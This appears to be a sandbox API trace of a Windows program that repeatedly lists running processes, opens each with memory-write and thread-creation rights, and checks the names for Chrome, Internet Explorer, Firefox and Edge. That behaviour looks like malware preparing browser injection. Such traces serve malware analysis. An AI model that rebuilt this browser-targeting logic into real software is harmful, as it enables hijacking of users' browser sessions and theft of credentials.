	[0243.390] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0243.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8c4c
	[0243.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.391] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0243.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.391] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.391] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0243.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.392] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.392] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8c50
	[0243.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.393] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.394] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.394] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.394] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0243.395] CloseHandle (hObject=0x4fd0) returned 1
	[0243.395] Sleep (dwMilliseconds=0x64) 
	[0243.503] GetCurrentProcessId () returned 0x110
	[0243.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0243.506] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0243.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0243.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0243.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8c54
	[0243.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.508] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.509] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.509] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.509] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.509] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8c58
	[0243.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.510] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.511] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.511] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.511] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0243.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8c5c
	[0243.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.512] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0243.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.513] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.513] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0243.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.513] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8c60
	[0243.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.514] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.515] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.515] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.515] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0243.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8c64
	[0243.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.517] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0243.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.517] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.518] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0243.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.518] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0243.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8c68
	[0243.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.519] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0243.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.520] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.520] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0243.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.520] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0243.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8c6c
	[0243.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.522] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0243.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.522] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.522] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0243.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.522] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0243.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8c70
	[0243.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.524] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.524] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.524] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.524] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8c74
	[0243.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.526] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.526] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.526] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8c78
	[0243.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.528] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.528] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.528] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.529] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8c7c
	[0243.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.530] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.530] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.530] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.531] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8c80
	[0243.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.532] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.533] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.533] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.533] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8c84
	[0243.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.535] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.535] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.535] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.536] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8c88
	[0243.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.537] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.537] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.537] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.538] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8c8c
	[0243.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.539] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.539] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.540] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.540] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0243.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8c90
	[0243.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.541] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0243.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.542] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.542] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0243.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.542] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8c94
	[0243.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.543] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.544] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.544] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.544] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.545] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0243.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8c98
	[0243.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.546] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.546] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.546] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.547] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8c9c
	[0243.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.549] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.549] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.549] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.550] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.550] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8ca0
	[0243.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.551] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.551] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.552] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.552] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.552] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8ca4
	[0243.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.553] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.553] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.554] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.554] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.554] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0243.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8ca8
	[0243.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.555] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0243.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.556] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.556] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
